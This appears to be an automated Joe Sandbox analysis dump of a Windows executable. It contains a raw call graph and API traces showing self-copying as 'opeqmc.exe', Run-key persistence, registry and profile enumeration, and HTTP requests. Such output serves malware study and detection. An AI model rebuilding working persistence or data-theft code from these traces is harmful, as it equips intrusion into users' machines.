6453 408692 6338->6453 6341 402be8 SysFreeString 6341->6298 6343 402c11 SysFreeString 6341->6343 6343->6298 6343->6343 6345 40a906 6344->6345 6346 406d14 2 API calls 6345->6346 6347 40a917 Sleep 6345->6347 6348 40a92c 6345->6348 6346->6345 6347->6345 6349 4078cb 12 API calls 6348->6349 6350 40aa37 6349->6350 6351 406cb5 GetVersionExW 6350->6351 6352 40aa52 6351->6352 6353 40a718 5 API calls 6352->6353 6354 40aa7e 6353->6354 6355 40a744 5 API calls 6354->6355 6357 40aa91 6355->6357 6356 406e69 22 API calls 6356->6357 6357->6356 6358 40aabc Sleep 6357->6358 6359 40aae5 GetProcessHeap HeapFree 6357->6359 6360 40a744 5 API calls 6357->6360 6358->6357 6359->6282 6360->6357 6362 40a479 6361->6362 6364 40a4ef 6362->6364 6365 40a4dc 6362->6365 6469 40a156 6362->6469 6364->6285 6365->6364 6366 40a530 InternetOpenW 6365->6366 6366->6364 6367 40a545 InternetSetOptionW 6366->6367 6367->6364 6371 40a352 6368->6371 6369 40a442 6373 40284a 6369->6373 6494 40a2d9 6369->6494 6371->6369 6371->6373 6486 40a245 6371->6486 6373->6288 6373->6289 6376 40a662 Sleep 6374->6376 6376->6293 6378 40735e __aulldiv 6377->6378 6378->6291 6380 409f37 6379->6380 6381 409f40 GetTickCount 6380->6381 6382 409f5f GetTickCount 6381->6382 6383 409fa7 6382->6383 6384 409f67 PeekMessageW 6382->6384 6383->6295 6385 409f88 Sleep 6384->6385 6386 409f7c DispatchMessageW 6384->6386 6385->6382 6386->6384 6510 40a582 6387->6510 6389 408f35 6390 408f3e 6389->6390 6391 408f78 SysFreeString 6389->6391 6397 408f96 6389->6397 6390->6296 6391->6391 6391->6397 6392 409039 6393 409040 6392->6393 6394 409043 SysFreeString 6392->6394 6395 409058 6392->6395 6393->6394 6394->6390 6396 409091 GetTickCount 6395->6396 6403 40905f 6395->6403 6405 4090ae 6396->6405 6397->6392 6400 409025 SysFreeString 6397->6400 6398 40908f 6401 409108 SysFreeString 6398->6401 6402 40911b SysFreeString 6398->6402 6399 40906a SysAllocString 6399->6403 6400->6397 6401->6401 6401->6402 6402->6390 6403->6398 6403->6399 6404 4090c7 SysAllocString 6404->6405 6405->6398 6405->6404 6407 40a582 2 API calls 6406->6407 6408 4091cc 6407->6408 6409 4091d2 6408->6409 6518 409655 6408->6518 6409->6301 6420 408a1a 6412->6420 6413 408bc4 6414 408c1c GetTickCount 6413->6414 6416 408a1e 6413->6416 6414->6416 6415 408c0d VariantClear 6415->6416 6416->6308 6417 408b99 SysFreeString 6417->6420 6418 408bab VariantClear 6418->6413 6418->6420 6419 408b6b SysFreeString 6419->6420 6420->6413 6420->6415 6420->6416 6420->6417 6420->6418 6420->6419 6425 409217 6421->6425 6423 409295 SysAllocString 6423->6314 6425->6423 6522 408091 6425->6522 6427 409c54 SysAllocString 6426->6427 6428 402a27 SysAllocString SysFreeString 6426->6428 6427->6428 6428->6306 6430 408832 6429->6430 6431 40a469 14 API calls 6430->6431 6433 408857 6431->6433 6432 40885c 6432->6341 6433->6432 6434 40a345 22 API calls 6433->6434 6442 408883 6434->6442 6435 40888a 6438 40a65e Sleep 6435->6438 6436 4088eb 6437 409f2b 5 API calls 6436->6437 6439 4088f6 6437->6439 6438->6432 6440 4089fd 5 API calls 6439->6440 6441 408911 6440->6441 6441->6435 6450 40891f 6441->6450 6442->6435 6442->6436 6530 409301 6442->6530 6445 4089f0 SysFreeString 6446 40a65e Sleep 6446->6450 6447 40a469 14 API calls 6447->6450 6448 40a345 22 API calls 6448->6450 6449 409f2b 5 API calls 6449->6450 6450->6445 6450->6446 6450->6447 6450->6448 6450->6449 6451 409301 7 API calls 6450->6451 6452 4089cd SysFreeString SysFreeString 6451->6452 6452->6450 6454 40a469 14 API calls 6453->6454 6456 4086b1 6454->6456 6455 4086b6 6455->6341 6456->6455 6457 40a345 22 API calls 6456->6457 6458 4086de 6457->6458 6459 4086e5 6458->6459 6460 4086f8 6458->6460 6461 40a65e Sleep 6459->6461 6462 409f2b 5 API calls 6460->6462 6461->6455 6464 408703 6462->6464 6463 40874a CharLowerW SysFreeString 6468 40876c 6463->6468 6464->6463 6465 408811 6467 409f2b 5 API calls 6467->6468 6468->6465 6468->6467 6541 408cb7 6468->6541 6470 40a16f 6469->6470 6471 40a16a 6469->6471 6475 40a188 SysAllocString 6470->6475 6484 40a057 GetForegroundWindow CoCreateInstance SetForegroundWindow 6470->6484 6481 40a0b5 CoInitialize 6471->6481 6477 40a1b8 6475->6477 6476 40a224 6476->6365 6477->6476 6478 40a1ce FindWindowW 6477->6478 6479 40a1e8 GetWindowLongW SetWindowLongW SetWindowPos 6478->6479 6480 40a1de SetParent 6478->6480 6479->6476 6480->6479 6482 40a0cc GetModuleHandleW CreateWindowExW 6481->6482 6483 40a0fd 6482->6483 6483->6470 6485 40a093 6484->6485 6485->6475 6485->6476 6487 40a262 _memset 6486->6487 6488 40a2d6 6486->6488 6489 40a270 SysAllocString SysAllocString 6487->6489 6488->6369 6490 40a2b3 6489->6490 6491 40a2c3 SysFreeString SysFreeString 6490->6491 6500 409fb1 6490->6500 6491->6488 6493 40a2c2 6493->6491 6495 40a2f4 6494->6495 6499 40a2f0 6494->6499 6496 40a313 6495->6496 6497 40a2fe GetProcessHeap HeapFree 6495->6497 6498 409c99 11 API calls 6496->6498 6497->6496 6498->6499 6499->6373 6509 40d258 6500->6509 6502 409fbd GetTickCount 6503 409fd3 6502->6503 6504 409fde GetTickCount 6503->6504 6505 40a030 6503->6505 6504->6505 6506 409fea Sleep 6504->6506 6505->6493 6507 409ff2 PeekMessageW 6506->6507 6507->6503 6508 40a005 DispatchMessageW 6507->6508 6508->6507 6509->6502 6511 40a5a0 6510->6511 6512 40a5a4 6510->6512 6511->6389 6513 40a63f 6512->6513 6516 40a5ae 6512->6516 6514 40a63b 6513->6514 6515 40a64e SysAllocString 6513->6515 6514->6389 6515->6514 6516->6514 6517 40a632 SysFreeString 6516->6517 6517->6514 6520 40966d 6518->6520 6519 4091eb SysFreeString 6519->6409 6520->6519 6521 40c5d0 __VEC_memcpy 6520->6521 6521->6519 6524 40809e __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 6522->6524 6523 408212 6523->6425 6524->6523 6526 407f4f 6524->6526 6528 407f5c 6526->6528 6527 407f71 6527->6524 6528->6527 6529 4072ed 3 API calls 6528->6529 6529->6527 6531 409314 6530->6531 6532 4088de SysFreeString SysFreeString 6531->6532 6533 40933b CharLowerW 6531->6533 6537 409364 6531->6537 6532->6436 6534 409351 6533->6534 6535 409362 SysFreeString 6534->6535 6536 409359 SysFreeString 6534->6536 6535->6537 6536->6532 6537->6532 6538 4093ae SysAllocString SysAllocString 6537->6538 6539 4093d7 SysFreeString SysFreeString 6538->6539 6539->6532 6543 408cd2 6541->6543 6542 408cd6 6542->6468 6543->6542 6544 408f17 VariantClear 6543->6544 6545 408e8f 6543->6545 6547 408e6d SysFreeString 6543->6547 6548 408e76 VariantClear 6543->6548 6549 408e2c SysFreeString 6543->6549 6551 409581 6543->6551 6544->6542 6545->6542 6546 408ed5 SysAllocString 6545->6546 6546->6542 6547->6548 6548->6543 6548->6545 6549->6543 6552 409591 6551->6552 6553 409595 6552->6553 6554 409599 CharLowerW 6552->6554 6553->6543 6555 4095fb 6554->6555 6557 4095b3 6554->6557 6556 40960a SysFreeString 6555->6556 6556->6543 6557->6555 6557->6556 6558 4095d5 CharLowerW 6557->6558 6559 4095df 6558->6559 6560 409605 SysFreeString 6559->6560 6560->6556 6912 403e18 6913 40821c PathCombineW 6912->6913 6914 403e3d 6913->6914 6915 403e4c 6914->6915 6916 403e8f 6914->6916 6922 403e87 6914->6922 6918 408248 8 API calls 6915->6918 6917 40c519 4 API calls 6916->6917 6921 403e9c 6917->6921 6918->6922 6919 40c5b9 SysFreeString 6919->6921 6920 40c43d 4 API calls 6920->6921 6921->6919 6921->6920 6921->6922 6923 40be3a HeapFree 6921->6923 6924 40c00b 3 API calls 6921->6924 6923->6921 6924->6921 6925 409a99 6926 409aa6 6925->6926 6927 409723 __VEC_memcpy 6926->6927 6928 409ac4 6927->6928 6929 409b18 6928->6929 6930 409723 __VEC_memcpy 6928->6930 6931 409ae9 6930->6931 6931->6929 6932 409af2 SysAllocString SysAllocString 6931->6932 6932->6929 6933 409f99 Sleep 6934 409fa7 6933->6934 6561 402c62 6570 406c77 RegOpenKeyExW 6561->6570 6563 402c77 6564 406cb5 GetVersionExW 6563->6564 6565 402c7c 6564->6565 6566 40a8f9 34 API calls 6565->6566 6567 402c8f 6566->6567 6568 40267a 122 API calls 6567->6568 6569 402ca8 6568->6569 6571 406c9b 6570->6571 6572 406c9f 6570->6572 6571->6563 6575 4069c0 RegQueryValueExW RegCloseKey 6572->6575 6574 406cb0 6574->6563 6575->6574 6935 40d2a4 6936 40d2ac 6935->6936 6937 40d378 __except_handler3 6936->6937 6941 40d790 6936->6941 6940 40d2e5 __except_handler3 _CallDestructExceptionObject 6940->6937 6947 40d110 RtlUnwind 6940->6947 6944 40d7e5 _ValidateScopeTableHandlers __except_handler3 __FindPESection 6941->6944 6946 40d7d1 _ValidateScopeTableHandlers __except_handler3 __FindPESection 6941->6946 6942 40d99d VirtualQuery 6943 40d9b2 6942->6943 6942->6946 6945 40d9cc GetVersionExA 6943->6945 6943->6946 6944->6942 6944->6946 6945->6946 6946->6940 6948 40d128 6947->6948 6948->6940 6576 4053ea HeapCreate 6577 405408 GetProcessHeap 6576->6577 6578 40541c 6576->6578 6577->6578 6595 403740 6578->6595 6596 40375a 6595->6596 6712 40848f RegOpenKeyExW 6596->6712 6599 4037c3 6607 4037f6 SHGetFolderPathW 6599->6607 6608 408248 8 API calls 6599->6608 6609 403837 6599->6609 6600 4037a2 ExpandEnvironmentStringsW 6722 4034a8 6600->6722 6602 403846 6604 40be3a HeapFree 6602->6604 6603 40383c 6726 4033a0 6603->6726 6606 403844 6604->6606 6610 403c10 6606->6610 6607->6599 6608->6599 6609->6602 6609->6603 6611 403c29 6610->6611 6612 40848f 7 API calls 6611->6612 6613 403c6d 6612->6613 6614 403c79 ExpandEnvironmentStringsW 6613->6614 6625 403ca9 6613->6625 6740 4039ea HeapAlloc 6614->6740 6616 403e00 6619 4033a0 HeapFree 6616->6619 6617 403e0a 6620 40be3a HeapFree 6617->6620 6621 403e08 6619->6621 6620->6621 6632 4040e7 6621->6632 6622 403d18 SHGetFolderPathW 6622->6625 6624 408248 8 API calls 6624->6625 6625->6622 6625->6624 6626 403d88 6625->6626 6629 403df7 6625->6629 6757 4039a3 6625->6757 6627 40848f 7 API calls 6626->6627 6626->6629 6628 403dc8 6627->6628 6628->6629 6630 403dd4 ExpandEnvironmentStringsW 6628->6630 6629->6616 6629->6617 6631 4039a3 8 API calls 6630->6631 6631->6629 6636 404100 6632->6636 6633 40412c SHGetFolderPathW 6633->6636 6634 408248 8 API calls 6634->6636 6635 40416d 6637 404172 6635->6637 6638 40417c 6635->6638 6636->6633 6636->6634 6636->6635 6639 4033a0 HeapFree 6637->6639 6640 40be3a HeapFree 6638->6640 6641 40417a 6639->6641 6640->6641 6642 4041e4 HeapAlloc 6641->6642 6647 404212 6642->6647 6654 404453 6642->6654 6643 4042a0 RegOpenKeyExW 6643->6647 6644 40440f RegEnumKeyExW 6646 404427 RegCloseKey 6644->6646 6644->6647 6645 40443d 6648 40be3a HeapFree 6645->6648 6646->6647 6647->6643 6647->6644 6647->6645 6655 40848f 7 API calls 6647->6655 6656 40435e RegOpenKeyExW 6647->6656 6657 40845d 2 API calls 6647->6657 6658 40c3f9 wvnsprintfW 6647->6658 6659 40c00b 3 API calls 6647->6659 6649 404445 6648->6649 6650 404455 6649->6650 6651 40444b 6649->6651 6653 40be3a HeapFree 6650->6653 6652 4033a0 HeapFree 6651->6652 6652->6654 6653->6654 6660 40451b 6654->6660 6655->6647 6656->6647 6657->6647 6658->6647 6659->6647 6761 40be9d 6660->6761 6662 404535 HeapAlloc 6663 404786 6662->6663 6677 404555 6662->6677 6664 404796 6663->6664 6665 40478c 6663->6665 6667 40be3a HeapFree 6664->6667 6666 4033a0 HeapFree 6665->6666 6668 404794 6666->6668 6667->6668 6680 404a92 6668->6680 6669 4045c5 RegOpenKeyExW 6670 4045e8 RegEnumKeyExW 6669->6670 6669->6677 6670->6677 6671 404780 6672 40be3a HeapFree 6671->6672 6672->6663 6673 40476a RegCloseKey 6673->6677 6674 40848f 7 API calls 6674->6677 6675 40473d RegEnumKeyExW 6675->6677 6677->6669 6677->6671 6677->6673 6677->6674 6677->6675 6678 40c3f9 wvnsprintfW 6677->6678 6679 40c00b 3 API calls 6677->6679 6762 40854c RegOpenKeyExW 6677->6762 6678->6677 6679->6677 6681 404aab 6680->6681 6682 404ad7 SHGetFolderPathW 6681->6682 6683 408248 8 API calls 6681->6683 6684 404b18 6681->6684 6682->6681 6683->6681 6685 404b27 6684->6685 6686 404b1d 6684->6686 6687 40be3a HeapFree 6685->6687 6688 4033a0 HeapFree 6686->6688 6689 404b25 6687->6689 6688->6689 6690 405136 6689->6690 6691 405150 6690->6691 6692 40848f 7 API calls 6691->6692 6693 4051e0 ExpandEnvironmentStringsW 6691->6693 6694 40520b 6691->6694 6692->6691 6695 404e7b 8 API calls 6693->6695 6696 405211 6694->6696 6697 40521b 6694->6697 6695->6691 6699 4033a0 HeapFree 6696->6699 6698 40be3a HeapFree 6697->6698 6700 405219 6698->6700 6699->6700 6701 405229 6700->6701 6702 405238 6701->6702 6703 407b4e 9 API calls 6702->6703 6704 4052e8 6703->6704 6705 406d14 2 API calls 6704->6705 6708 405361 Sleep 6704->6708 6711 405372 6704->6711 6705->6704 6706 40537c Sleep 6706->6711 6708->6704 6709 4053cb Sleep 6709->6711 6710 4053e0 6711->6706 6711->6709 6711->6710 6766 409df4 6711->6766 6713 4084af 6712->6713 6716 4084c5 6712->6716 6730 40845d RegQueryValueExW 6713->6730 6715 403796 6715->6599 6715->6600 6716->6715 6733 40bfd0 6716->6733 6718 408518 6719 40852e 6718->6719 6720 40851f ExpandEnvironmentStringsW 6718->6720 6721 408531 GetProcessHeap HeapFree 6719->6721 6720->6719 6720->6721 6721->6715 6723 4034bc 6722->6723 6724 408248 8 API calls 6723->6724 6725 40350a 6724->6725 6725->6599 6728 4033a4 6726->6728 6727 40be3a HeapFree 6729 4033d7 6727->6729 6728->6727 6729->6606 6731 408482 RegCloseKey 6730->6731 6732 40847f 6730->6732 6731->6716 6732->6731 6734 40bfd7 6733->6734 6735 40bfda 6733->6735 6734->6718 6736 40bff3 6735->6736 6739 40be27 HeapAlloc 6735->6739 6736->6718 6738 40bffa 6738->6718 6739->6738 6741 403bb9 PathRemoveFileSpecW 6740->6741 6742 403a1a GetPrivateProfileStringW 6740->6742 6741->6625 6743 403a36 6742->6743 6754 403baf 6742->6754 6745 403a48 HeapAlloc 6743->6745 6743->6754 6744 40be3a HeapFree 6744->6741 6746 403a64 6745->6746 6745->6754 6747 403ac8 StrStrIW 6746->6747 6752 403ba9 6746->6752 6755 40c3f9 wvnsprintfW 6746->6755 6756 40c00b 3 API calls 6746->6756 6747->6746 6748 403add StrStrIW 6747->6748 6748->6746 6749 403af2 GetPrivateProfileStringW 6748->6749 6749->6746 6750 403b09 GetPrivateProfileStringW 6749->6750 6750->6746 6751 403b26 GetPrivateProfileStringW 6750->6751 6751->6746 6753 40be3a HeapFree 6752->6753 6753->6754 6754->6744 6755->6746 6756->6746 6758 4039b7 6757->6758 6759 408248 8 API calls 6758->6759 6760 4039e5 6759->6760 6760->6625 6761->6662 6763 40856f 6762->6763 6765 408585 6762->6765 6764 40845d 2 API calls 6763->6764 6764->6765 6765->6677 6767 409e01 6766->6767 6779 40beea 6767->6779 6770 409eb1 HttpOpenRequestW 6771 409ead 6770->6771 6773 409ecf HttpSendRequestW 6770->6773 6771->6711 6774 40be3a HeapFree 6773->6774 6775 409eea 6774->6775 6775->6771 6776 409eef InternetReadFile 6775->6776 6776->6771 6777 409f0c 6776->6777 6787 40bf35 6777->6787 6780 40bef4 6779->6780 6791 40beb4 6780->6791 6783 409e3e InternetConnectW 6783->6770 6783->6771 6785 40bf1c 6785->6783 6786 40beb4 WideCharToMultiByte 6785->6786 6786->6783 6788 40bf3a 6787->6788 6789 40bf3f MultiByteToWideChar 6787->6789 6788->6789 6790 40bf58 6789->6790 6790->6771 6792 40bec3 WideCharToMultiByte 6791->6792 6793 40bebe 6791->6793 6794 40bedd 6792->6794 6793->6792 6794->6783 6795 40be27 HeapAlloc 6794->6795 6795->6785 6955 40d2ac 6956 40d2ca 6955->6956 6959 40d378 __except_handler3 6955->6959 6957 40d790 __except_handler3 2 API calls 6956->6957 6958 40d2e5 __except_handler3 _CallDestructExceptionObject 6957->6958 6958->6959 6960 40d110 __except_handler3 RtlUnwind 6958->6960 6960->6958 6961 402cad 6962 406c77 3 API calls 6961->6962 6963 402cc3 6962->6963 6964 406cb5 GetVersionExW 6963->6964 6965 402cc8 6964->6965 6966 40a8f9 34 API calls 6965->6966 6967 402cdb 6966->6967 6968 40267a 122 API calls 6967->6968 6969 402d00 6968->6969 6970 409c6f SysFreeString 6969->6970 6971 402d08 6970->6971 6972 4032af ExitProcess 6977 402c32 6978 40267a 122 API calls 6977->6978 6979 402c56 6978->6979 6980 409c6f SysFreeString 6979->6980 6981 402c5e 6980->6981 6796 402df3 6797 406c77 3 API calls 6796->6797 6798 402e08 6797->6798 6799 406cb5 GetVersionExW 6798->6799 6800 402e0d 6799->6800 6801 40a8f9 34 API calls 6800->6801 6802 402e20 6801->6802 6803 40267a 122 API calls 6802->6803 6804 402e39 6803->6804 6982 4094b6 6983 4094c9 6982->6983 6984 4094cd 6983->6984 6985 4094f3 CharLowerW CharLowerW 6983->6985 6986 4094e3 SysFreeString 6983->6986 6988 409560 6985->6988 6989 409512 6985->6989 6987 40957e 6986->6987 6990 40956f SysFreeString SysFreeString 6988->6990 6989->6988 6989->6990 6991 40953a CharLowerW 6989->6991 6990->6987 6992 409544 6991->6992 6993 40956a SysFreeString 6992->6993 6993->6990 6999 402db7 7000 40267a 122 API calls 6999->7000 7001 402dd1 7000->7001 7002 40183a 7003 401854 7002->7003 7004 408091 3 API calls 7003->7004 7007 401958 7003->7007 7005 40194a 7004->7005 7006 408091 3 API calls 7005->7006 7006->7007 7008 4097bc 7009 409655 __VEC_memcpy 7008->7009 7010 4097d6 7009->7010 7011 409805 7010->7011 7012 4097df SysAllocString SysAllocString 7010->7012 7012->7011 7015 402e3e 7026 402e4d 7015->7026 7016 40327c 7017 402eb7 GetModuleFileNameW 7018 402ed6 GetCurrentDirectoryW 7017->7018 7017->7026 7018->7026 7019 402f2a GetLastError 7020 40a786 35 API calls 7019->7020 7020->7026 7021 40253c 50 API calls 7021->7026 7022 403251 GetLastError 7022->7026 7023 403237 GetLastError 7023->7026 7024 40a786 35 API calls 7024->7026 7025 407552 Sleep 7025->7026 7026->7016 7026->7017 7026->7019 7026->7021 7026->7022 7026->7023 7026->7024 7026->7025 7038 403bbf 7039 40821c PathCombineW 7038->7039 7040 403bdf 7039->7040 7041 403bf9 7040->7041 7042 403bfe 7040->7042 7043 403bee 7040->7043 7045 4039ea 12 API calls 7042->7045 7044 4039a3 8 API calls 7043->7044 7044->7041 7045->7041

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                                                                                                                                                                                                  • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                                                                                                                                                                                                  • GetFileSize.KERNEL32(?,00000000), ref: 0040762E
                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407638
                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0040763F
                                                                                                                                                                                                  • ReadFile.KERNELBASE(?,00000000,00000000,?,00000000), ref: 00407660
                                                                                                                                                                                                  • WriteFile.KERNELBASE(?,?,00000000,?,00000000), ref: 0040767F
                                                                                                                                                                                                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000), ref: 00407691
                                                                                                                                                                                                  • ReadFile.KERNELBASE(?,?,00000040,?,00000000), ref: 004076A1
                                                                                                                                                                                                  • SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 004076AF
                                                                                                                                                                                                  • ReadFile.KERNELBASE(?,?,000000F8,?,00000000), ref: 004076C5
                                                                                                                                                                                                  • SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 004076EF
                                                                                                                                                                                                  • WriteFile.KERNELBASE(?,?,000000F8,?,00000000), ref: 00407705
                                                                                                                                                                                                  • CloseHandle.KERNELBASE(?), ref: 00407714
                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00407719
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$PointerRead$CloseCreateHandleHeapWrite$AllocateProcessSize
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2296163861-0
                                                                                                                                                                                                  • Opcode ID: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
                                                                                                                                                                                                  • Instruction ID: 7ae3b020874f099f6a4231377d147a855b3f50186be4225f3fece46b7b724b47
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F0416A71901028BADB209BA2DD48EEFBF7DEF45390F104476F619F21A0D7709A10DB64

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 121 40abd9-40abf5 call 40ac20 124 40abf7-40ac0c FindFirstFileW 121->124 125 40ac1a 121->125 124->125 126 40ac0e-40ac18 FindClose 124->126 127 40ac1c-40ac1f 125->127 126->127
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,74DF0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                                                                                                                                                                                                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,00000000), ref: 0040AC03
                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040AC0F
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FindOpen$CloseFileFirst
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3155378417-0
                                                                                                                                                                                                  • Opcode ID: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                                                                                                                                                                                                  • Instruction ID: fa0310e4c65bbc590993533f650c85f5e3ee77ef27cd51fa1c8f473dbf319076
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5DE0D87160C7044BE220E7B49D0C967B3DCAB45325F000F36A9B6E20C0FA38D46A465F

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B36C
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B39D
                                                                                                                                                                                                    • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                                                                                                                                                                                                  • GetLastError.KERNEL32(00000004), ref: 0040B3CA
                                                                                                                                                                                                  • Sleep.KERNEL32(00002710), ref: 0040B3F7
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B413
                                                                                                                                                                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0040B435
                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040B44D
                                                                                                                                                                                                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,74DF0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                                                                                                                                                                                                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                                                                                                                                                                                                  • GetLastError.KERNEL32(00000004), ref: 0040B48D
                                                                                                                                                                                                  • GetLastError.KERNEL32(00000004), ref: 0040B49A
                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 0040B4C7
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B4D7
                                                                                                                                                                                                  • GetLastError.KERNEL32(00000004), ref: 0040B500
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$ErrorLastModuleName$Open$CopyCreateEnvironmentExitExpandProcessSleepStrings
                                                                                                                                                                                                  • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$opeqmc.exe
                                                                                                                                                                                                  • API String ID: 3692109554-477663111
                                                                                                                                                                                                  • Opcode ID: 55bb52feb6c62d8aec5773147cbc2c373a20a80f20ddf5eadf9f4fa8ccd6a04a
                                                                                                                                                                                                  • Instruction ID: ccf8aad4361994264e72a39918ed7d53ff083e628d4a69ee62a5d407c68d8035
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 55bb52feb6c62d8aec5773147cbc2c373a20a80f20ddf5eadf9f4fa8ccd6a04a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C4127719042186AE710B7A19D46FAB73ACEF04345F14447BBB05F11C2EB789A548AAF

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 73 40ac20-40ac48 RegOpenKeyExW 74 40ac60-40ac76 RegOpenKeyExW 73->74 75 40ac4a-40ac55 call 4069c0 73->75 77 40ac78-40ac7a 74->77 78 40ac7c-40ac87 call 4069c0 74->78 79 40ac5a-40ac5e 75->79 80 40ac8e-40ac92 77->80 82 40ac8c-40ac8d 78->82 79->74 79->80 82->80
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,74DF0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                                                                                                                                                                                                  • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
